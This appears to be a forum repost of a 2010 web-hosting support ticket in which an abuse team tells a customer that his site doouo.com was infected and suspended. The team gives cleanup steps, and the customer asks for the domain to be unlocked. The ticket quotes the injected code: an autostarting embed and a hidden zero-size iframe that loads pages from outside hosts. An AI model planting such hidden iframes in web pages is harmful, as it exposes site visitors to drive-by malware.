|
|
1 Submission by GabrielIchim
created Jan 21, 2010 at 03:48 AM
view raw message
Hello,
We have received the following complaint regarding your account:
Dear abuse team,
please help to close these offending viruses sites(1) so far.
status: As of 2010-01-19 21:32:26 CET
http://support.clean-mx.de/clean-mx/viruses.php?email=hostmaster@lunarpages.com&response=alive
(for full uri, please scroll to the right end ...
We detected many active cases dated back to 2007, so please look at the date column below.
You may also subscribe to our MalwareWatch list http://lists.clean-mx.com/cgi-bin/mailman/listinfo/viruswatch
This information has been generated out of our comprehensive real time database, tracking worldwide viruses URI's
most likely also affected pages for these ip may be found via passive dns
please have a look on these other domains correlated to these ip
example: see http://www.bfk.de/bfk_dnslogger.html?query=216.227.214.83
If your review this list of offending site, please do this carefully, pay attention for redirects also!
Also, please consider this particular machines may have a root kit installed !
So simply deleting some files or dirs or disabling cgi may not really solve the issue !
Advice: The appearance of a Virus Site on a server means that
someone intruded into the system. The server's owner should
disconnect and not return the system into service until an
audit is performed to ensure no data was lost, that all OS and
internet software is up to date with the latest security fixes,
and that any backdoors and other exploits left by the intruders
are closed. Logs should be preserved and analyzed and, perhaps,
the appropriate law enforcement agencies notified.
DO NOT JUST DELETE THE FILES. IF YOU DO NOT FIX THE SECURITY
PROBLEM, THEY WILL BE BACK!
You may forward my information to law enforcement, CERTs,
other responsible admins, or similar agencies.
+-----------------------------------------------------------------------------------------------
|date |id |virusname |ip |domain |Url|
+-----------------------------------------------------------------------------------------------
|2010-01-19 16:20:43 CET |362456 |Mal_Hifrm |216.227.214.83 |doouo.com |http://doouo.com/
+-----------------------------------------------------------------------------------------------
Your email address has been pulled out of whois concerning this offending network block(s).
If you are not concerned with anti-fraud measurements, please forward this mail to the next responsible desk available...
If you just close(d) these incident(s) please give us a feedback, our automatic walker process may not detect a closed case
explanation of virusnames:
==========================
unknown_html_RFI_php not yet detected by scanners as RFI, but pure php code for injection
unknown_html_RFI_perl not yet detected by scanners as RFI, but pure perl code for injection
unknown_html_RFI_eval not yet detected by scanners as RFI, but suspect javascript obfuscationg evals
unknown_html_RFI not yet detected by scanners as RFI, but trapped by our honeypots as remote-code-injection
unknown_html not yet detected by scanners as RFI, but suspious, may be in rare case false positive
unknown_exe not yet detected by scanners as malware, but high risk!
all other names malwarename detected by scanners
==========================
We have found the following malicious code inserted into your files:
<EMBED
src=http://www.muslumangenc.com/media/ezan/2.htm =true AUTOSTART="TRUE"
LOOP="TRUE"> <NOEMBED><BGSOUND src="http://www.muslumangenc.com/media/ezan/2.htm"
loop=infinite></NOEMBED></EMBED>
<iframe src="http://mangasit.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
The list with the infected files is huge and we recommend recreating your account from scratch. We have forced to suspend your account and we are waiting for your answer.
What we would suggest is the following:
1. Scan your local computer for viruses and malware. Remove any suspicious files found. You may also scan the files on your account using an anti-virus scanner as most infected files are usually recognized by anti-virus scanners. I would suggest Trend Micro which is a pretty good free anti-virus and can be downloaded from http://housecall.trendmicro.com/
2. Change your main account's password along with any other passwords that are involved (mail accounts, FTP accounts). The main account password can be reset via the CAP (Customer Account Page) at http://account.lunarpages.com.It is recommended that you create passwords using alphanumeric characters (ex: Aa1Bb2Cc3). Also, you would want to make sure that you do not use a password that is related to your domain name or site content. This will decrease the likelyhood of your password being compromised.
3. Update all your application to the latest stable version. Old application versions have security issues, which can also allow malicious injections into sites. The only way to keep your site secure under such circumstances would be to ensure you always are running the latest, secured versions of the application.
4. Re-upload the content on the server. Please also make sure to not store the new password locally (thus avoiding the "Remember my password" option).
Please proceed with the above mentioned steps and let us know if the issue will be reoccurring.
Thank you!
If you have any more questions, please don't hesitate to ask us, we will be more than happy to answer them. Please feel free to contact us for further help.
---
Gabriel Ichim
Junior System Administrator 1
Phone: 1-714-521-8150 (U.S. & International)
2 Response by Dongdong Liang
created Jan 22, 2010 at 01:39 AM
view raw message
Please unlock my domain name
my domain: www.doouo.com
3 Response by Dongdong Liang
created Jan 22, 2010 at 01:17 PM
view raw message
Hello,
cp, and ftp fail, I can not control
4 Response by GabrielIchim
created Jan 23, 2010 at 03:06 AM
view raw message
Hello,
Please note that your account is suspended and your can connect only through cPanel to check your files. Please proceed with the steps mentioned above and let us know once done so we can scan again and unsuspend your account.
Thank you!
If you have any more questions, please don't hesitate to ask us, we will be more than happy to answer them. Please feel free to contact us for further help.
---
Gabriel Ichim
Junior System Administrator 1
Phone: 1-714-521-8150 (U.S. & International)
5 Response by Dongdong Liang
created Jan 23, 2010 at 09:29 AM
view raw message
Hello
Please unlock my domain name
my domain: www.doouo.com
6 Response by Dongdong Liang
created Jan 23, 2010 at 07:38 PM
view raw message
Hello
My domain will expire, and I want to move out, please help me unlock
Thank you very much
My Domain:doouo.com
7 Response by Saa Maphinda-Lebbie
created Jan 23, 2010 at 08:05 PM
view raw message
Hello,
We tried to contact you via phone and no
one answer as well as no voicemail
please responded to the ticket with the appropriated
actions or contact us if you have any questions or concerns
Best Regards,
Saa Maphinda-Lebbie
Junior System Admin I - Systems Administrator Team
Lunarpages Webhosting
8 Response by Saa Maphinda-Lebbie
created Jan 23, 2010 at 08:14 PM
view raw message
Tried to contact customer via phone and phone number may be wrong will need an updated one
asked customer to reply to the ticket |
|
国外虚拟主机
2129 人阅读
|
4 人回复
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡